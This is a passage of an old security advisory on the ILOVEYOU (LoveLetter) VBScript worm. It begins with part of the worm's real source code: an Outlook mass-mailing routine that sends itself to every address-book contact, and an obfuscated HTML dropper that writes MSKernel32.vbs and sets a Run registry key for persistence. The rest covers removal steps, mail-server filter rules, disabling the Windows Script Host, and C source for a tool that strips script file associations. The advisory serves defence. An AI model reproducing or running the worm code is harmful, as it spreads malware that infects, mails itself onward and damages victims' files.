regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a) if (regv="") then regv=1 end if if (int(a.AddressEntries.Count)>int(regv)) then for ctrentries=1 to a.AddressEntries.Count malead=a.AddressEntries(x) regad="" regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead) if (regad="") then set male=out.CreateItem(0) male.Recipients.Add(malead) male.Subject = "fwd: Joke" male.Body = vbcrlf&"" male.Attachments.Add(dirsystem&"\Very Funny.vbs") male.Send regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD" end if x=x+1 next regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count else regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count end if next Set out=Nothing Set mapi=Nothing end sub sub html On Error Resume Next dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6 dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _ "<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-? @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _ "<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@-@>"&vbcrlf& _ "<?-?HEAD><BODY ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ "&vbcrlf& _ "ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _ "<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>- Please press #-#YES#-# button to Enable ActiveX<?-?p>"&vbcrlf& _ "<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE> "&vbcrlf& _ "<?-?BODY><?-?HTML>"&vbcrlf& _ "<SCRIPT language=@-@JScript@-@>"&vbcrlf& _ "<!--?-??-?"&vbcrlf& _ "if (window.screen){var wi=screen.availWidth;var hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _ "?-??-?-->"&vbcrlf& _ "<?-?SCRIPT>"&vbcrlf& _ "<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _ "<!--"&vbcrlf& _ "on error resume next"&vbcrlf& _ "dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _ "aw=1"&vbcrlf& _ "code=" dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _ "set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _ "code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _ "code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _ "code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _ "set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _ "wri.write code4"&vbcrlf& _ "wri.close"&vbcrlf& _ "if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _ "if (err.number=424) then"&vbcrlf& _ "aw=0"&vbcrlf& _ "end if"&vbcrlf& _ "if (aw=1) then"&vbcrlf& _ "document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _ "window.close"&vbcrlf& _ "end if"&vbcrlf& _ "end if"&vbcrlf& _ "Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _ "regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _ "?-??-?-->"&vbcrlf& _ "<?-?SCRIPT>" dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'") dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""") dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/") dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\") dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'") dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""") dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/") dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\") set fso=CreateObject("Scripting.FileSystemObject") set c=fso.OpenTextFile(WScript.ScriptFullName,1) lines=Split(c.ReadAll,vbcrlf) l1=ubound(lines) for n=0 to ubound(lines) lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91)) lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93)) lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37)) if (l1=n) then lines(n)=chr(34)+lines(n)+chr(34) else lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _" end if next set b=fso.CreateTextFile(dirsystem+"\Very Funny.HTM") b.close set d=fso.OpenTextFile(dirsystem+"\Very Funny.HTM",2) d.write dt5 d.write join(lines,vbcrlf) d.write vbcrlf d.write dt6 d.close end sub SOLUTION Everyone should obtain and install the latest virus definition files for their virus scanning software. Mail administrators should filter out any email that has a .VBS attachment, or at least any mail with a subject line of "ILOVEYOU". Removing the virus is easy enough, but as another author said ("The Pope"), it is painful, and if you have useful VBScript, WSH or other files of similar nature (listed below), you may have already lost very valuable data. The steps are: 1. Remove the registry entries HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL HKCU\Software\Microsoft\Internet Explorer\Main\Start Page 2. Remove *all* instance of the following files: LOVE-LETTER-FOR-YOU.HTM *.vbs *.vbs *.vbe *.js *.jse *.css *.wsh *.sct *.hta Find hidden files of .mp2 and .mp3 extensions, and remove the "hidden" bit. It is also a good idea to clear the "documents" folder. Some AV vendors with solutions for this problem: Alladin: http://www.aks.com/home/csrt/valerts.asp CA: http://www.ca.com/virusinfo/virusalert.htm DrSolomon: http://www.drsolomons.com/home/extra.zip F-Secure: http://www.f-secure.com/download-purchase/updates.html Finjan: http://www.finjan.com/attack_release_detail.cfm?attack_release_id=34 McAffe: http://download.mcafee.com/extrafiles/love-4.zip NAI: http://vil.nai.com/villib/dispVirus.asp?virus_k=98617 Proland: http://www.pspl.com/virus_info/worms/loveletter.htm Sophos: http://www.sophos.com/virusinfo/analyses/vbsloveleta.html Sophos: http://www.sophos.com/virusinfo/analyses/trojloveleta.html Symantec: http://www.symantec.com/avcenter/venc/data/vbs.loveletter.a.html TrendMicro: http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=VBS_LOVELETTER-O Jose Nazario has been kind enough to put up a rulseset for sendmail 8.9.x and 8.10.x that stops messages with "ILOVEYOU" in the subject file. You can find it at: http://biocserver.cwru.edu/~jose/iloveyouhack.txt Matt Davis points out that you can modify John D. Hardin's procmail filters to stop the worm. You can find them at ftp://ftp.rubyriver.com/pub/jhardin/antispam/procmail-security.html Sendmail.com has a rule to filter the worm based on the subject header at http://www2.sendmail.com/loveletter. It works with Sendmail 8.9 and newer. If you are a Postfix users you can stop the virus by doing the following: * Make sure your version of postfix supports the header_checks directive. * Add the line "header_checks = regexp:/etc/postfix/header_checks" to your main.cf file. * Create a /etc/postfix/header_checks file with a line of: /^Subject:.*ILOVEYOU/ REJECT or better yet /Content.*\.vbs/ REJECT * Execute "postfix reload". For Exchange Steve Willocks recommends Mail essentials for Exchange/SMTP. Its a commercial product that you configure to block messages based on types of attachments or keyword matches among other features. You can find it at www.gfi.com/mesindex.htm At least in some intances it seems tabs in the virus code have been changed to spaces. That means the code looks the same but its not. Some antivirus products may be fooled by this. Trend Micro Interscan for mail servers, Solaris version, seems to be affected. Thanks to Brett Dikeman for pointing this out. Anyway, while everyone has been scrambling east and west, north and south trying to find the answer to these VBS viruses, the answer is not eMail filtering, it's not better firewalls, or failing members of the FBI community. It is a file called WScript.Exe. A batch (.BAT) file with these two lines will deal with this problem: ren %SystemRoot%\system32\wscript.exe wscript.sav ren c:\windows\wscript.exe wscript.sav If you get rid of this engine, then all Visual Basic Scripts cannot be run. This will only do 50% of the job. There is a 2nd version of the scripting host with the name cscript.exe. This one normally deals with commandline scripts (that is, scripts which don't use their own window but send their output to a shell). CSCRIPT.EXE is also attached to .vbs, .vbe, .jse etc. file types through the registry. If you want to get rid of wscript.exe under win2k, just delete %systemroot%\system32\dllcache\wscript.exe first, and then %systemroot%\system32\dllcache\wscript.exe. If you then simply refuse to insert the Win2k CD when SFP asks for it, that file will be marked as "not restored" somewhere within the bowels of the registry, and SFP will (hopefully) continue to shut up about it. This will also be visible in the Event Log. The Cerberus Security Team have written a tool that will prevent PC users from being infected by such viral worms as the now infamous "I Love You" and its many variants and any others that are still only a gleam in the eye of the budding virus writer. These rely on basic default configurations of a standard Microsoft box to be able to spread - and also a little help from the user by actually opening the attachment! As many will be aware 99% of files on a Windows machine have a three letter extension. This extension tells Windows Explorer how to deal with each file. For example, if you double click on a file with the .txt extension Explorer will look in the Registry to see what application to use to open it - notepad.exe in this case. As far as the "I Love You" worm is concerned it has a .vbs extension and so, when opened by the person it has been sent to, Windows looks in the Regsitry to see what application it should use to deal with the file - in this case wscript.exe. wscript.exe is script interpreter and when passed the file it executes the code it finds there - very much like what command.com or cmd.exe does for batch (.bat) files. The tool the Cerberus Security Team has written goes through the registry and removes these application / file extention associations for VBS,VBE,WSF,WSH, JS and JSE and any viruses or worms that rely on these associations will therefore fail. These are all "dangerous" mappings and to be perfectly frank most computers users never use the functionality provided by these. They provide the source code at the end of this mail and also make the binary version available from their website: http://www.cerberus-infosec.co.uk/vf.exe It has been tested on Windows 98, Windows NT 4 and Windows 2000. Though not yet tested on Windows 95 it should still work. Source: //////////////////////////////////////////////////////////////////////////// //////// // // compile with eg Visual C++ link with advapi32.lib // // Cerberus Information Security, Ltd // // 8th May 2000 // //////////////////////////////////////////////////////////////////////////// ///////// #include <windows.h> #include <stdio.h> #include <winreg.h> #define SUCCESS 1 #define FAILURE 0 HKEY KeyToChange = HKEY_CLASSES_ROOT; int ChangeFileAssociations(void); int ConnectToRemoteRegistry(char *); LONG DoSetAKey(HKEY, char *, char *); int main(int argc,char *argv[]) { DWORD chk=0; char hostname[260]="\\\\"; char *errors = "There were errors changing the file associations.\n"; char *noerrors = "VBS,VBE,WSF,WSH,JS and JSE file associations have been changed.\n"; printf("\nCerberus Security Team\nhttp://www.cerberus-infosec.co.uk/\n8th May 2000\n\n"); if(argc == 1) { chk = ChangeFileAssociations(); if(chk) { printf(noerrors); return SUCCESS; } else { printf(errors); return FAILURE; } } else { if ( stricmp( argv[1], "/?" ) == 0 ) || ( stricmp( argv[1], "-?" ) == 0 ) || ( stricmp( argv[1], "/h" ) == 0 ) || ( stricmp( argv[1], "-h" ) == 0 ) || ( stricmp( argv[1], "?" ) == 0 ) || ( stricmp( argv[1], "help" ) == 0 ) || ( stricmp( argv[1], "/help" ) == 0 )) { return 0; } else { strncat(hostname,argv[1],250); chk = ConnectToRemoteRegistry(hostname); if (!chk) { printf("Error connecting to %s\n",hostname); return FAILURE; } else { chk = ChangeFileAssociations(); if(chk) { printf(noerrors); return SUCCESS; } else { printf(errors); return FAILURE; } } } } } int ConnectToRemoteRegistry(char *host) { HKEY hkcr = HKEY_CLASSES_ROOT; LONG connect; connect = RegConnectRegistry(host,hkcr,&KeyToChange); if(connect == ERROR_SUCCESS) { return SUCCESS; } else { return FAILURE; } } int ChangeFileAssociations() { LONG chk=0; chk = DoSetAKey(KeyToChange,"VBSFile\\Shell\\Open\\Command","Foobar"); if(chk != SUCCESS) { if(chk != ERROR_FILE_NOT_FOUND) { printf("Error %d\n",chk); return FAILURE; } } chk = DoSetAKey(KeyToChange,"VBSFile\\Shell\\Open2\\Command","Foobar"); if(chk != SUCCESS) { if(chk != ERROR_FILE_NOT_FOUND) { printf("Error %d\n",chk); return FAILURE; } } chk = DoSetAKey(KeyToChange,"WSHFile\\Shell\\Open\\Command","Foobar"); if(chk != SUCCESS) { if(chk != ERROR_FILE_NOT_FOUND) { printf("Error %d\n",chk); return FAILURE; } } chk = DoSetAKey(KeyToChange,"WSHFile\\Shell\\Open2\\Command","Foobar"); if(chk != SUCCESS) { if(chk != ERROR_FILE_NOT_FOUND) { printf("Error %d\n",chk); return FAILURE; } } chk = DoSetAKey(KeyToChange,"VBEFile\\Shell\\Open\\Command","Foobar"); if(chk != SUCCESS) { if(chk != ERROR_FILE_NOT_FOUND) { printf("Error %d\n",chk); return FAILURE; } } chk = DoSetAKey(KeyToChange,"VBEFile\\Shell\\Open2\\Command","Foobar"); if(chk != SUCCESS) { if(chk != ERROR_FILE_NOT_FOUND) { printf("Error %d\n",chk); return FAILURE; } } chk = DoSetAKey(KeyToChange,"WSFFile\\Shell\\Open\\Command","Foobar"); if(chk != SUCCESS) { if(chk != ERROR_FILE_NOT_FOUND) { printf("Error %d\n",chk); return FAILURE; } } chk = DoSetAKey(KeyToChange,"WSFFile\\Shell\\Open2\\Command","Foobar"); if(chk != SUCCESS) { if(chk != ERROR_FILE_NOT_FOUND) { printf("Error %d\n",chk); return FAILURE; } } chk = DoSetAKey(KeyToChange,"JSEFile\\Shell\\Open\\Command","Foobar"); if(chk != SUCCESS) { if(chk != ERROR_FILE_NOT_FOUND) { printf("Error %d\n",chk); return FAILURE; } } chk = DoSetAKey(KeyToChange,"JSEFile\\Shell\\Open2\\Command","Foobar"); if(chk != SUCCESS) { if(chk != ERROR_FILE_NOT_FOUND) { printf("Error %d\n",chk); return FAILURE; } } chk = DoSetAKey(KeyToChange,"JSFile\\Shell\\Open\\Command","Foobar"); if(chk != SUCCESS) { if(chk != ERROR_FILE_NOT_FOUND) { printf("Error %d\n",chk); return FAILURE; } } chk = DoSetAKey(KeyToChange,"JSFile\\Shell\\Open2\\Command","Foobar"); if(chk != SUCCESS) { if(chk != ERROR_FILE_NOT_FOUND) { printf("Error %d\n",chk); return FAILURE; } } return SUCCESS; } LONG DoSetAKey(HKEY root, char *key, char *set) { HKEY hResult; DWORD bufsize = MAX_PATH; LONG nResult; nResult = RegOpenKeyEx(root,key,0,KEY_WRITE,&hResult); if(nResult != ERROR_SUCCESS) { if(nResult != ERROR_FILE_NOT_FOUND) { RegCloseKey(hResult); return FAILURE; } else { return ERROR_FILE_NOT_FOUND; } } nResult = RegSetValueEx(hResult,NULL,0,REG_MULTI_SZ,(CONST BYTE*)set,strlen(set)); if(nResult != ERROR_SUCCESS) { RegCloseKey(hResult); return FAILURE; } else { printf("Success\n"); RegCloseKey(hResult); return SUCCESS; } } Microsoft released the binaries for their Email Security Update. Available now is a version for Outlook 98; http://www.officeupdate.com/downloadDetails/Out98sec.htm and Outlook 2000 SR-1: http://www.officeupdate.com/2000/downloaddetails/Out2ksec.htm Nothing is currently available to alter the way Outlook Express works. These updates are strictly for Outlook 98/2000 SR-1. Note that after installing the Outlook 98 Security Update on some test workstations, you will find that it works as advertised on NT and WIN 98 machines, but on the Win 95 machines, you can no longer route documents from Word 97. When you try to route a document in Word 97 via file-sendto-routing recipient, you will get the error "YOUR MAIL SYSTEM DOES NOT SUPPORT CERTAIN SERVICES NEEDED FOR DOCUMENT ROUTING". Reliable Software Technologies released a new program designed to prevent e-mail macro viruses from spreading. It can be used along with or instead of the Microsoft supplied e-mail protection patch. JustBeFriends works will all versions of Outlook and Outlook Express, and is substantially simpler than the Microsoft patch. For full details, see http://www.rstcorp.com/news/jbf.html